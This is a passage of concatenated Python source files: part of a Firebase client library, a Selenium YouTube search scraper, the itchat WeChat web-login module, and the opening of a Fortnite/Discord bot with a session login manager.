sorted_response = sorted(
request_dict.items(), key=lambda item: item[1])
else:
sorted_response = sorted(
request_dict.items(),
key=lambda item: item[1][build_query["orderBy"]])
return PyreResponse(convert_to_pyre(sorted_response), query_key)
def push(self, data, token=None, json_kwargs={}):
request_ref = self.check_token(self.database_url, self.path, token)
self.path = ""
headers = self.build_headers(token)
request_object = self.requests.post(
request_ref, headers=headers, data=json.dumps(
data, **json_kwargs).encode("utf-8"))
raise_detailed_error(request_object)
return request_object.json()
def set(self, data, token=None, json_kwargs={}):
request_ref = self.check_token(self.database_url, self.path, token)
self.path = ""
headers = self.build_headers(token)
request_object = self.requests.put(
request_ref, headers=headers, data=json.dumps(
data, **json_kwargs).encode("utf-8"))
raise_detailed_error(request_object)
return request_object.json()
def update(self, data, token=None, json_kwargs={}):
request_ref = self.check_token(self.database_url, self.path, token)
self.path = ""
headers = self.build_headers(token)
request_object = self.requests.patch(
request_ref, headers=headers, data=json.dumps(
data, **json_kwargs).encode("utf-8"))
raise_detailed_error(request_object)
return request_object.json()
def remove(self, token=None):
request_ref = self.check_token(self.database_url, self.path, token)
self.path = ""
headers = self.build_headers(token)
request_object = self.requests.delete(request_ref, headers=headers)
raise_detailed_error(request_object)
return request_object.json()
def stream(self, stream_handler, token=None, stream_id=None):
request_ref = self.build_request_url(token)
return Stream(
request_ref,
stream_handler,
self.build_headers,
stream_id)
def check_token(self, database_url, path, token):
if token:
return '{0}{1}.json?auth={2}'.format(database_url, path, token)
else:
return '{0}{1}.json'.format(database_url, path)
def generate_key(self):
push_chars = '-0123456789' + \
'ABCDEFGHIJKLMNOPQRSTUVWXYZ_' + \
'abcdefghijklmnopqrstuvwxyz'
now = int(time.time() * 1000)
duplicate_time = now == self.last_push_time
self.last_push_time = now
time_stamp_chars = [0] * 8
for i in reversed(range(0, 8)):
time_stamp_chars[i] = push_chars[now % 64]
now = int(math.floor(now / 64))
new_id = "".join(time_stamp_chars)
if not duplicate_time:
for i in range(0, 12):
self.last_rand_chars.append(
int(math.floor(uniform(0, 1) * 64)))
else:
for i in range(0, 11):
if self.last_rand_chars[i] == 63:
self.last_rand_chars[i] = 0
self.last_rand_chars[i] += 1
for i in range(0, 12):
new_id += push_chars[self.last_rand_chars[i]]
return new_id
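# This mirrors Firebase's "push id" scheme: the first 8 characters encode
# the millisecond timestamp in the 64-character alphabet above, followed by
# 12 pseudo-random characters; when two keys are generated within the same
# millisecond, the random tail is incremented (roughly following the
# reference algorithm) so keys stay unique and lexicographically ordered.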
def sort(self, origin, by_key):
# unpack pyre objects
pyres = origin.each()
new_list = []
for pyre in pyres:
new_list.append(pyre.item)
# sort
data = sorted(dict(new_list).items(), key=lambda item: item[1][by_key])
return PyreResponse(convert_to_pyre(data), origin.key())
class Storage:
""" Storage Service """
def __init__(self, credentials, storage_bucket, requests):
from google.cloud import storage
self.storage_bucket = \
"https://firebasestorage.googleapis.com/v0/b/" + storage_bucket
self.credentials = credentials
self.requests = requests
self.path = ""
if credentials:
client = storage.Client(
credentials=credentials,
project=storage_bucket)
self.bucket = client.get_bucket(storage_bucket)
def child(self, *args):
new_path = "/".join(args)
if self.path:
self.path += "/{}".format(new_path)
else:
if new_path.startswith("/"):
new_path = new_path[1:]
self.path = new_path
return self
def put(self, file, token=None, userid='guest'):
# reset path
path = self.path
self.path = None
if isinstance(file, str):
with open(file, 'rb') as file_object:
return self._put_file(path, file_object, token, userid)
else:
return self._put_file(path, file, token, userid)
def _put_file(self, path, file_object, token, userid):
request_ref = self.storage_bucket + "/o?name={0}".format(path)
def post_file(**kwargs):
def _post_file():
request_object = self.requests.post(
request_ref, data=file_object, **kwargs)
raise_detailed_error(request_object)
return request_object
return retry(
_post_file,
no_retries=10,
sleep_time=5,
exception_class=HTTPServerError)
if token:
headers = {"Authorization": "Firebase " + token}
request_object = post_file(headers=headers)
if userid:
headers['Content-Type'] = 'application/json'
def patch_owner():
patch_request = self.requests.patch(
request_ref,
headers=headers,
data=json.dumps({'metadata': {'owner': userid}})
)
raise_detailed_error(patch_request)
return patch_request
retry(
patch_owner,
no_retries=10,
sleep_time=5,
exception_class=HTTPServerError)
return request_object.json()
elif self.credentials:
blob = self.bucket.blob(path)
if isinstance(file_object, str):
return blob.upload_from_filename(filename=file_object)
else:
return blob.upload_from_file(file_obj=file_object)
else:
return post_file().json()
def delete(self, name):
self.bucket.delete_blob(name)
def download(self, filename, token=None):
# remove leading slash
path = self.path
url = self.get_url(token)
self.path = None
if path.startswith('/'):
path = path[1:]
if self.credentials:
blob = self.bucket.get_blob(path)
blob.download_to_filename(filename)
else:
def _download_internal():
r = requests.get(url, stream=True)
raise_detailed_error(r)
if r.status_code == 200:
with open(filename, 'wb') as f:
for chunk in r:
f.write(chunk)
elif r.status_code >= 500:
raise HTTPServerError(r.status_code, r.text)
retry(
_download_internal,
no_retries=10,
sleep_time=5,
exception_class=HTTPServerError)
def get_url(self, token):
path = self.path
self.path = None
if path.startswith('/'):
path = path[1:]
if token:
return "{0}/o/{1}?alt=media&token={2}".format(
self.storage_bucket, quote(path, safe=''), token)
return "{0}/o/{1}?alt=media".format(self.storage_bucket,
quote(path, safe=''))
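# Example (hypothetical path/token): storage.child("images/pic.png").get_url(token)
# returns "<storage_bucket>/o/images%2Fpic.png?alt=media&token=<token>";
# quote(path, safe='') percent-encodes the "/" separators as %2F.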
def list_files(self):
return self.bucket.list_blobs()
class HTTPServerError(Exception):
def __init__(self, statuscode, message):
self.msg = message
self.statuscode = statuscode
def raise_detailed_error(request_object):
try:
status = request_object.status_code
if status >= 500:
raise HTTPServerError(status, request_object.text)
request_object.raise_for_status()
except HTTPError as e:
# raise detailed error message
# TODO: Check if we get a { "error" : "Permission denied." } and handle
# automatically
raise HTTPError(e, request_object.text)
def convert_to_pyre(items):
pyre_list = []
for item in items:
pyre_list.append(Pyre(item))
return pyre_list
def convert_list_to_pyre(items):
pyre_list = []
for item in items:
pyre_list.append(Pyre([items.index(item), item]))
return pyre_list
class PyreResponse:
def __init__(self, pyres, query_key):
self.pyres = pyres
self.query_key = query_key
def val(self):
if isinstance(self.pyres, list):
# unpack pyres into OrderedDict
pyre_list = []
# if firebase response was a list
if isinstance(self.pyres[0].key(), int):
for pyre in self.pyres:
pyre_list.append(pyre.val())
return pyre_list
# if firebase response was a dict with keys
for pyre in self.pyres:
pyre_list.append((pyre.key(), pyre.val()))
return OrderedDict(pyre_list)
else:
# return primitive or simple query results
return self.pyres
def key(self):
return self.query_key
def each(self):
if isinstance(self.pyres, list):
return self.pyres
class Pyre:
def __init__(self, item):
self.item = item
def val(self):
return self.item[1]
def key(self):
return self.item[0]
class KeepAuthSession(Session):
"""
A session that doesn't drop Authentication on redirects between domains.
"""
def rebuild_auth(self, prepared_request, response):
pass
class ClosableSSEClient(SSEClient):
def __init__(self, *args, **kwargs):
self.should_connect = True
super(ClosableSSEClient, self).__init__(*args, **kwargs)
def _connect(self):
if self.should_connect:
super(ClosableSSEClient, self)._connect()
else:
raise StopIteration()
def close(self):
self.should_connect = False
self.retry = 0
self.resp.raw._fp.fp.raw._sock.shutdown(socket.SHUT_RDWR)
self.resp.raw._fp.fp.raw._sock.close()
class Stream:
def __init__(self, url, stream_handler, build_headers, stream_id):
self.build_headers = build_headers
self.url = url
self.stream_handler = stream_handler
self.stream_id = stream_id
self.sse = None
self.thread = None
self.start()
def make_session(self):
"""
Return a custom session object to be passed to the ClosableSSEClient.
"""
session = KeepAuthSession()
return session
def start(self):
self.thread = threading.Thread(target=self.start_stream)
self.thread.start()
return self
def start_stream(self):
self.sse = ClosableSSEClient(
self.url,
session=self.make_session(),
build_headers=self.build_headers)
for msg in self.sse:
if msg:
msg_data = json.loads(msg.data)
msg_data["event"] = msg.event
if self.stream_id:
msg_data["stream_id"] = self.stream_id
self.stream_handler(msg_data)
def close(self):
# wait until the SSE client and its response object both exist
while not self.sse or not hasattr(self.sse, 'resp'):
time.sleep(0.001)
self.sse.running = False
self.sse.close()
self.thread.join()
return self
|
search.py
|
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from time import sleep, time
import pandas as pd
from threading import Thread
import requests
import re
from random import random
# choose a driver
wd = webdriver.Chrome()
# specify the wait time for a new page to be fully loaded
wait_time_for_loading = 5
links_titles = []
ytv_info = []
yt_channel_v_links = []
def crawl_page(url):
wd.get(url)
def converter_to_url(query_):
fma = 'https://www.youtube.com/results?search_query={}'
return fma.format('+'.join(q for q in query_.split(' ')))
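# e.g. converter_to_url('python tutorial')
# -> 'https://www.youtube.com/results?search_query=python+tutorial'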
def get_tar_txt(regex, src_txt):
text = re.findall(rf'{regex}', src_txt)
if len(text) != 0:
text = text[0]
# text = text[0] if len(text) == 1 or text[0] != text[-1] else text[1]
else:
text = ""
return text
def get_digits(strg):
if len(strg) != 0:
if strg.endswith(('K', 'k')):
num = float(strg[:-1]) * 1000
elif strg.endswith(('M', 'm')):
num = float(strg[:-1]) * 1000000
else:
num = float(''.join(s for s in strg if s.isdigit()))
return num
else:
return ''
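# e.g. get_digits('1.2K') -> 1200.0, get_digits('3M') -> 3000000.0,
# get_digits('1,234') -> 1234.0, get_digits('') -> ''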
def multi_tasking(func, a_list, length, speed):
threads = []
for i in range(0, length, speed):
# slicing clamps at the end of the list, so a plain chunk is safe here
t = Thread(target=func, args=(a_list[i:i + speed],))
t.start()
threads.append(t)
for t in threads:
t.join()
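# e.g. multi_tasking(get_videos_info, links, len(links), 20) starts one
# thread per 20-item chunk of `links` and joins them all before returning.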
def scroll_down(scrolling_limit=30):
sleep(wait_time_for_loading)
videos = wd.find_elements_by_xpath('//*[@id="video-title"]')
# set a counter to avoid long time crawling
counter = 0
while True:
wd.find_element_by_tag_name('body').send_keys(Keys.END) # Scroll down to the bottom
print("Scrolling..." if random() > 0.5 else "..........")
sleep(wait_time_for_loading)
videos_new = wd.find_elements_by_xpath('//*[@id="video-title"]')
counter += 1
if len(videos) != len(videos_new) and counter != scrolling_limit:
videos = videos_new
else:
break
def get_links_titles(videos_):
for video in videos_:
try:
link = video.get_attribute('href')
if link is not None:
title = video.text
links_titles.append([link, title])
except Exception:
continue
print("Processing..." if random() > 0.5 else "..........")
return links_titles
def get_videos_info(links_titles_):
for link_title in links_titles_:
link = link_title[0]
title = link_title[1]
r = requests.get(link)
when = get_tar_txt('[A-Z][a-z]{2} \d{1,}, [\d]{4}', r.text)
views = get_digits(get_tar_txt('(?<="viewCount":{"simpleText":")[\d,]+(?= views)', r.text))
likes = get_digits(get_tar_txt('[\d,]+(?= likes)', r.text))
dislikes = get_digits(get_tar_txt('[\d,]+(?= dislikes)', r.text))
difference = likes - dislikes if dislikes != '' else likes
ratio = "" if dislikes == '' else likes/dislikes
youtuber = get_tar_txt('(?<=ChannelName\":\")[^"]+', r.text)
num_sub = get_digits(get_tar_txt('[\d.]+[KkMm]?(?= subscribers)', r.text))
home_videos_page = 'https://www.youtube.com' + \
get_tar_txt('(?<=url":")/channel/[^"]+', r.text) + '/videos'
ytv_info.append([title, when, views, likes, dislikes, difference, ratio,
youtuber, home_videos_page, num_sub, link])
yt_channel_v_links.append(home_videos_page)
print("Processing..." if random() > 0.5 else "..........")
def run(query):
global links_titles, ytv_info, yt_channel_v_links
start = time()
url = converter_to_url(query)
links_titles = []
yt_channel_v_links = []
ytv_info = [['Title', 'Posted on', 'Views', 'Likes', 'Dislikes', 'Difference(L-D)', 'Ratio(L/D)',
'Posted by', 'HOME_VIDEOS_PAGE_LINK', 'Subscribers','Video Link']]
crawl_page(url)
scroll_down(2)
videos = wd.find_elements_by_xpath('//*[@id="video-title"]')
multi_tasking(get_links_titles, videos, len(videos), 100)
print("Collecting videos info...")
multi_tasking(get_videos_info, links_titles, len(links_titles), 20)
print('Creating file....')
pd.DataFrame(ytv_info).to_excel(f'{query}.xlsx')
print(f'File {query}.xlsx created!')
end = time()
print("Total time taken: " + str((end-start)))
return links_titles, set(yt_channel_v_links)
def quit_out():
wd.quit()
def main():
queries = ['A list of queries...']
for query in queries:
try:
run(query)
except Exception:
continue
quit_out()
if __name__ == '__main__':
main()
|
login.py
|
import os, sys, time, re, io
import threading
import json, xml.dom.minidom
import copy, pickle, random
import traceback, logging
try:
from httplib import BadStatusLine
except ImportError:
from http.client import BadStatusLine
import requests
import datetime
from pyqrcode import QRCode
from .. import config, utils
from ..returnvalues import ReturnValue
from ..storage.templates import wrap_user_dict
from .contact import update_local_chatrooms, update_local_friends
# from .messages import produce_msg
logger = logging.getLogger('itchat')
def load_login(core):
core.login = login
core.get_QRuuid = get_QRuuid
core.get_QR = get_QR
core.check_login = check_login
core.web_init = web_init
core.show_mobile_login = show_mobile_login
core.sync_check = sync_check
core.start_receiving = start_receiving
core.get_msg = get_msg
core.logout = logout
def login(self, enableCmdQR=False, picDir=None, qrCallback=None,
loginCallback=None, exitCallback=None):
if self.alive or self.isLogging:
logger.warning('itchat has already logged in.')
return
self.isLogging = True
while self.isLogging:
uuid = push_login(self)
if uuid:
qrStorage = io.BytesIO()
else:
logger.info('Getting uuid of QR code.')
while not self.get_QRuuid():
time.sleep(1)
logger.info('Downloading QR code.')
qrStorage = self.get_QR(enableCmdQR=enableCmdQR,
picDir=picDir, qrCallback=qrCallback)
logger.info('Please scan the QR code to log in.')
isLoggedIn = False
while not isLoggedIn:
status = self.check_login()
if hasattr(qrCallback, '__call__'):
qrCallback(uuid=self.uuid, status=status, qrcode=qrStorage.getvalue())
if status == '200':
isLoggedIn = True
elif status == '201':
if isLoggedIn is not None:
logger.info('Please press confirm on your phone.')
isLoggedIn = None
elif status != '408':
break
if isLoggedIn:
break
elif self.isLogging:
logger.info('Login timed out, reloading QR code.')
else:
return # log in process is stopped by user
logger.info('Loading contacts, this may take a little while.')
self.web_init()
self.show_mobile_login()
self.get_contact(True)
if hasattr(loginCallback, '__call__'):
r = loginCallback()
else:
utils.clear_screen()
if os.path.exists(picDir or config.DEFAULT_QR):
os.remove(picDir or config.DEFAULT_QR)
logger.info('Logged in successfully as %s' % self.storageClass.nickName)
self.start_receiving(exitCallback)
self.isLogging = False
def push_login(core):
cookiesDict = core.s.cookies.get_dict()
if 'wxuin' in cookiesDict:
url = '%s/cgi-bin/mmwebwx-bin/webwxpushloginurl?uin=%s' % (
config.BASE_URL, cookiesDict['wxuin'])
headers = { 'User-Agent' : config.USER_AGENT }
r = core.s.get(url, headers=headers).json()
if 'uuid' in r and r.get('ret') in (0, '0'):
core.uuid = r['uuid']
return r['uuid']
return False
def get_QRuuid(self):
url = '%s/jslogin' % config.BASE_URL
params = {
'appid' : 'wx782c26e4c19acffb',
'fun' : 'new', }
headers = { 'User-Agent' : config.USER_AGENT }
r = self.s.get(url, params=params, headers=headers)
regx = r'window.QRLogin.code = (\d+); window.QRLogin.uuid = "(\S+?)";'
data = re.search(regx, r.text)
if data and data.group(1) == '200':
self.uuid = data.group(2)
return self.uuid
def get_QR(self, uuid=None, enableCmdQR=False, picDir=None, qrCallback=None):
uuid = uuid or self.uuid
picDir = picDir or config.DEFAULT_QR
qrStorage = io.BytesIO()
qrCode = QRCode('https://login.weixin.qq.com/l/' + uuid)
qrCode.png(qrStorage, scale=10)
if hasattr(qrCallback, '__call__'):
qrCallback(uuid=uuid, status='0', qrcode=qrStorage.getvalue())
else:
if enableCmdQR:
utils.print_cmd_qr(qrCode.text(1), enableCmdQR=enableCmdQR)
else:
with open(picDir, 'wb') as f:
f.write(qrStorage.getvalue())
utils.print_qr(picDir)
return qrStorage
def check_login(self, uuid=None):
uuid = uuid or self.uuid
url = '%s/cgi-bin/mmwebwx-bin/login' % config.BASE_URL
localTime = int(time.time())
params = 'loginicon=true&uuid=%s&tip=1&r=%s&_=%s' % (
uuid, int(-localTime / 1579), localTime)
headers = { 'User-Agent' : config.USER_AGENT }
r = self.s.get(url, params=params, headers=headers)
regx = r'window.code=(\d+)'
data = re.search(regx, r.text)
if data and data.group(1) == '200':
if process_login_info(self, r.text):
return '200'
else:
return '400'
elif data:
return data.group(1)
else:
return '400'
def process_login_info(core, loginContent):
''' called when login finishes (after the QR code is scanned)
* syncUrl and fileUploadingUrl will be fetched
* deviceid and msgid will be generated
* skey, wxsid, wxuin, pass_ticket will be fetched
'''
regx = r'window.redirect_uri="(\S+)";'
core.loginInfo['url'] = re.search(regx, loginContent).group(1)
headers = { 'User-Agent' : config.USER_AGENT }
r = core.s.get(core.loginInfo['url'], headers=headers, allow_redirects=False)
core.loginInfo['url'] = core.loginInfo['url'][:core.loginInfo['url'].rfind('/')]
for indexUrl, detailedUrl in (
("wx2.qq.com" , ("file.wx2.qq.com", "webpush.wx2.qq.com")),
("wx8.qq.com" , ("file.wx8.qq.com", "webpush.wx8.qq.com")),
("qq.com" , ("file.wx.qq.com", "webpush.wx.qq.com")),
("web2.wechat.com" , ("file.web2.wechat.com", "webpush.web2.wechat.com")),
("wechat.com" , ("file.web.wechat.com", "webpush.web.wechat.com"))):
fileUrl, syncUrl = ['https://%s/cgi-bin/mmwebwx-bin' % url for url in detailedUrl]
if indexUrl in core.loginInfo['url']:
core.loginInfo['fileUrl'], core.loginInfo['syncUrl'] = \
fileUrl, syncUrl
break
else:
core.loginInfo['fileUrl'] = core.loginInfo['syncUrl'] = core.loginInfo['url']
core.loginInfo['deviceid'] = 'e' + repr(random.random())[2:17]
core.loginInfo['BaseRequest'] = {}
for node in xml.dom.minidom.parseString(r.text).documentElement.childNodes:
if node.nodeName == 'skey':
core.loginInfo['skey'] = core.loginInfo['BaseRequest']['Skey'] = node.childNodes[0].data
elif node.nodeName == 'wxsid':
core.loginInfo['wxsid'] = core.loginInfo['BaseRequest']['Sid'] = node.childNodes[0].data
elif node.nodeName == 'wxuin':
core.loginInfo['wxuin'] = core.loginInfo['BaseRequest']['Uin'] = node.childNodes[0].data
elif node.nodeName == 'pass_ticket':
core.loginInfo['pass_ticket'] = core.loginInfo['BaseRequest']['DeviceID'] = node.childNodes[0].data
if not all([key in core.loginInfo for key in ('skey', 'wxsid', 'wxuin', 'pass_ticket')]):
logger.error('Your wechat account may be LIMITED to log in WEB wechat, error info:\n%s' % r.text)
core.isLogging = False
return False
return True
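# Sketch of the redirect response body parsed above (assumed shape, values
# omitted):
#   <error><ret>0</ret><skey>...</skey><wxsid>...</wxsid>
#   <wxuin>...</wxuin><pass_ticket>...</pass_ticket></error>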
def web_init(self):
url = '%s/webwxinit' % self.loginInfo['url']
params = {
'r': int(-time.time() / 1579),
'pass_ticket': self.loginInfo['pass_ticket'], }
data = { 'BaseRequest': self.loginInfo['BaseRequest'], }
headers = {
'ContentType': 'application/json; charset=UTF-8',
'User-Agent' : config.USER_AGENT, }
r = self.s.post(url, params=params, data=json.dumps(data), headers=headers)
dic = json.loads(r.content.decode('utf-8', 'replace'))
# deal with login info
utils.emoji_formatter(dic['User'], 'NickName')
self.loginInfo['InviteStartCount'] = int(dic['InviteStartCount'])
self.loginInfo['User'] = wrap_user_dict(utils.struct_friend_info(dic['User']))
self.memberList.append(self.loginInfo['User'])
self.loginInfo['SyncKey'] = dic['SyncKey']
self.loginInfo['synckey'] = '|'.join(['%s_%s' % (item['Key'], item['Val'])
for item in dic['SyncKey']['List']])
self.storageClass.userName = dic['User']['UserName']
self.storageClass.nickName = dic['User']['NickName']
# deal with contact list returned when init
contactList = dic.get('ContactList', [])
chatroomList, otherList = [], []
for m in contactList:
if m['Sex'] != 0:
otherList.append(m)
elif '@@' in m['UserName']:
m['MemberList'] = [] # don't let dirty info pollute the list
chatroomList.append(m)
elif '@' in m['UserName']:
# mp will be dealt in update_local_friends as well
otherList.append(m)
if chatroomList:
update_local_chatrooms(self, chatroomList)
if otherList:
update_local_friends(self, otherList)
return dic
def show_mobile_login(self):
url = '%s/webwxstatusnotify?lang=zh_CN&pass_ticket=%s' % (
self.loginInfo['url'], self.loginInfo['pass_ticket'])
data = {
'BaseRequest' : self.loginInfo['BaseRequest'],
'Code' : 3,
'FromUserName' : self.storageClass.userName,
'ToUserName' : self.storageClass.userName,
'ClientMsgId' : int(time.time()), }
headers = {
'ContentType': 'application/json; charset=UTF-8',
'User-Agent' : config.USER_AGENT, }
r = self.s.post(url, data=json.dumps(data), headers=headers)
return ReturnValue(rawResponse=r)
def start_receiving(self, exitCallback=None, getReceivingFnOnly=False):
self.alive = True
def maintain_loop():
def get_today():
return datetime.date.today()
today = get_today()
retryCount = 0
while self.alive:
try:
i = self.sync_check()
if i is None:
self.alive = False
elif i == '0':
pass
else:
msgList, contactList = self.get_msg()
if msgList:
msgList = self.produce_msg(msgList)
for msg in msgList:
self.msgList.put(msg)
if contactList:
chatroomList, otherList = [], []
for contact in contactList:
if '@@' in contact['UserName']:
chatroomList.append(contact)
else:
otherList.append(contact)
chatroomMsg = update_local_chatrooms(self, chatroomList)
chatroomMsg['User'] = self.loginInfo['User']
self.msgList.put(chatroomMsg)
update_local_friends(self, otherList)
retryCount = 0
except requests.exceptions.ReadTimeout:
pass
except:
retryCount += 1
logger.error(traceback.format_exc())
if self.receivingRetryCount < retryCount:
self.alive = False
else:
time.sleep(3)
finally:
if get_today() > today:
today = get_today()
retryCount = 0
self.logout()
if hasattr(exitCallback, '__call__'):
exitCallback()
else:
logger.info('LOG OUT!')
if getReceivingFnOnly:
return maintain_loop
else:
maintainThread = threading.Thread(target=maintain_loop)
maintainThread.daemon = True
maintainThread.start()
def sync_check(self):
url = '%s/synccheck' % self.loginInfo.get('syncUrl', self.loginInfo['url'])
params = {
'r' : int(time.time() * 1000),
'skey' : self.loginInfo['skey'],
'sid' : self.loginInfo['wxsid'],
'uin' : self.loginInfo['wxuin'],
'deviceid' : self.loginInfo['deviceid'],
'synckey' : self.loginInfo['synckey'],
'_' : int(time.time() * 1000),}
headers = { 'User-Agent' : config.USER_AGENT }
try:
r = self.s.get(url, params=params, headers=headers, timeout=config.TIMEOUT)
except requests.exceptions.ConnectionError as e:
try:
if not isinstance(e.args[0].args[1], BadStatusLine):
raise
# will return a package with status '0 -'
# and value like:
# 6f:00:8a:9c:09:74:e4:d8:e0:14:bf:96:3a:56:a0:64:1b:a4:25:5d:12:f4:31:a5:30:f1:c6:48:5f:c3:75:6a:99:93
# it seems to indicate typing status, but until this is better understood the code will remain like this
return '2'
except:
raise
r.raise_for_status()
regx = r'window.synccheck={retcode:"(\d+)",selector:"(\d+)"}'
pm = re.search(regx, r.text)
if pm is None or pm.group(1) != '0':
logger.error('Unexpected sync check result: %s' % r.text)
return None
return pm.group(2)
def get_msg(self):
url = '%s/webwxsync?sid=%s&skey=%s&pass_ticket=%s' % (
self.loginInfo['url'], self.loginInfo['wxsid'],
self.loginInfo['skey'],self.loginInfo['pass_ticket'])
data = {
'BaseRequest' : self.loginInfo['BaseRequest'],
'SyncKey' : self.loginInfo['SyncKey'],
'rr' : ~int(time.time()), }
headers = {
'ContentType': 'application/json; charset=UTF-8',
'User-Agent' : config.USER_AGENT }
r = self.s.post(url, data=json.dumps(data), headers=headers, timeout=config.TIMEOUT)
dic = json.loads(r.content.decode('utf-8', 'replace'))
if dic['BaseResponse']['Ret'] != 0:
logger.error('Non-zero Ret in response: %s' % dic)
return None, None
self.loginInfo['SyncKey'] = dic['SyncCheckKey']
self.loginInfo['synckey'] = '|'.join(['%s_%s' % (item['Key'], item['Val'])
for item in dic['SyncCheckKey']['List']])
return dic['AddMsgList'], dic['ModContactList']
def logout(self):
if self.alive:
url = '%s/webwxlogout' % self.loginInfo['url']
params = {
'redirect' : 1,
'type' : 1,
'skey' : self.loginInfo['skey'], }
headers = { 'User-Agent' : config.USER_AGENT }
self.s.get(url, params=params, headers=headers)
self.alive = False
self.isLogging = False
self.s.cookies.clear()
del self.chatroomList[:]
del self.memberList[:]
del self.mpList[:]
return ReturnValue({'BaseResponse': {
'ErrMsg': 'logout successfully.',
'Ret': 0, }})
|
index.py
|
# -*- coding: utf-8 -*-
"""
MIT License
Copyright (c) 2020 gomashio1596
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
try:
import asyncio
import copy
import datetime
import json
import logging
import os
import platform
import random
import re
import socket
import string
import sys
import time
import traceback
import unicodedata
import webbrowser
from collections import defaultdict
from concurrent.futures import ThreadPoolExecutor, as_completed
from enum import Enum
from functools import partial, wraps
from glob import glob
from threading import Thread, Timer
from typing import Any, Callable, List, Optional, Type, Union
except ModuleNotFoundError as e:
import traceback
print(traceback.format_exc())
import platform
print(f'Python {platform.python_version()}\n')
print('標準ライブラリの読み込みに失敗しました。Pythonのバージョンが間違っている可能性があります。Pythonの再インストールなどを試してみてください。問題が修正されない場合は\nTwitter @gomashio1596\nDiscord gomashio#4335\nこちらか\nhttps://discord.gg/NEnka5N\nDiscordのサーバーまでお願いします')
print('Failed to load basic library. Python version maybe wrong. Try reinstall Python. If the issue is not resolved, contact me\nTwitter @gomashio1596\nDiscord gomashio#4335\nor please join support Discord server\nhttps://discord.gg/NEnka5N')
sys.exit(1)
try:
import aiohttp
import discord
import fortnitepy
import jaconv
import requests
import sanic.exceptions
import sanic.response
from aioconsole import ainput
from crayons import cyan, green, magenta, red, yellow
from fortnitepy import ClientPartyMember
from jinja2 import Environment, FileSystemLoader
from sanic import Sanic
from sanic.request import Request
except ModuleNotFoundError as e:
print(traceback.format_exc())
print(f'Python {platform.python_version()}\n')
print('サードパーティーライブラリの読み込みに失敗しました。INSTALL.bat を実行してください。問題が修正されない場合は\nTwitter @gomashio1596\nDiscord gomashio#4335\nこちらか\nhttps://discord.gg/NEnka5N\nDiscordのサーバーまでお願いします')
print('Failed to load third party library. Please run INSTALL.bat. If the issue is not resolved, contact me\nTwitter @gomashio1596\nDiscord gomashio#4335\nor please join support Discord server\nhttps://discord.gg/NEnka5N')
sys.exit(1)
if sys.platform == 'win32':
asyncio.set_event_loop(asyncio.ProactorEventLoop())
else:
try:
import uvloop
except ModuleNotFoundError:
pass
else:
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
if True:  # Classes
class PartyPrivacy(Enum):
PUBLIC = {
'partyType': 'Public',
'inviteRestriction': 'AnyMember',
'onlyLeaderFriendsCanJoin': False,
'presencePermission': 'Anyone',
'invitePermission': 'Anyone',
'acceptingMembers': True,
}
FRIENDS_ALLOW_FRIENDS_OF_FRIENDS = {
'partyType': 'FriendsOnly',
'inviteRestriction': 'LeaderOnly',
'onlyLeaderFriendsCanJoin': False,
'presencePermission': 'Anyone',
'invitePermission': 'Anyone',
'acceptingMembers': True,
}
FRIENDS = {
'partyType': 'FriendsOnly',
'inviteRestriction': 'LeaderOnly',
'onlyLeaderFriendsCanJoin': True,
'presencePermission': 'Leader',
'invitePermission': 'Leader',
'acceptingMembers': False,
}
PRIVATE_ALLOW_FRIENDS_OF_FRIENDS = {
'partyType': 'Private',
'inviteRestriction': 'LeaderOnly',
'onlyLeaderFriendsCanJoin': False,
'presencePermission': 'Noone',
'invitePermission': 'Anyone',
'acceptingMembers': False,
}
PRIVATE = {
'partyType': 'Private',
'inviteRestriction': 'LeaderOnly',
'onlyLeaderFriendsCanJoin': True,
'presencePermission': 'Noone',
'invitePermission': 'Leader',
'acceptingMembers': False,
}
class bool_:
@classmethod
def create(cls, content: str) -> bool:
d = {"false": False, "true": True}
return d.get(content.lower(), False)
class bool_none:
@classmethod
def create(cls, content: str) -> bool:
d = {"false": False, "true": True, "none": None}
return d.get(content.lower(), False)
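# e.g. bool_.create("True") -> True, bool_.create("yes") -> False (unknown
# strings default to False); bool_none.create("none") -> None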
class select:
def __init__(self, content: List[dict]) -> None:
self.content = content
class Red:
pass
class FixRequired:
pass
class CanLinebreak:
pass
class LoginManager:
def __init__(self) -> None:
self.id_len = 64
self.expire_time = datetime.timedelta(minutes=10)
self.expires = {}
self.cookie_key = "X-SessionId"
self.no_auth_handler_ = sanic.response.html("Unauthorized")
def generate_id(self, request: Request) -> str:
Id = "".join(random.choices(string.ascii_letters + string.digits, k=self.id_len))
while Id in self.expires.keys():
Id = "".join(random.choices(string.ascii_letters + string.digits, k=self.id_len))
return Id
def authenticated(self, request: Request) -> bool:
if data["web"]["login_required"]:
Id = request.cookies.get(self.cookie_key)
if not Id:
return False
elif Id in self.expires.keys():
return True
else:
return False
else:
return True
def login_user(self, request: Request, response: sanic.response.BaseHTTPResponse) -> None:
Id = self.generate_id(request)
response.cookies[self.cookie_key] = Id
self.expires[Id] = datetime.datetime.utcnow() + self.expire_time
def logout_user(self, request: Request, response: sanic.response.BaseHTTPResponse) -> None:
Id = request.cookies.get(self.cookie_key)
if Id:
del response.cookies[self.cookie_key]
# drop the session id so it can no longer authenticate
self.expires.pop(Id, None)
def login_required(self, func: Callable):
@wraps(func)
def deco(*args: Any, **kwargs: Any):
request = args[0]
if self.authenticated(request):
return func(*args, **kwargs)
elif isinstance(self.no_auth_handler_, sanic.response.BaseHTTPResponse):
return self.no_auth_handler_
elif callable(self.no_auth_handler_):
return self.no_auth_handler_(*args, **kwargs)
return deco
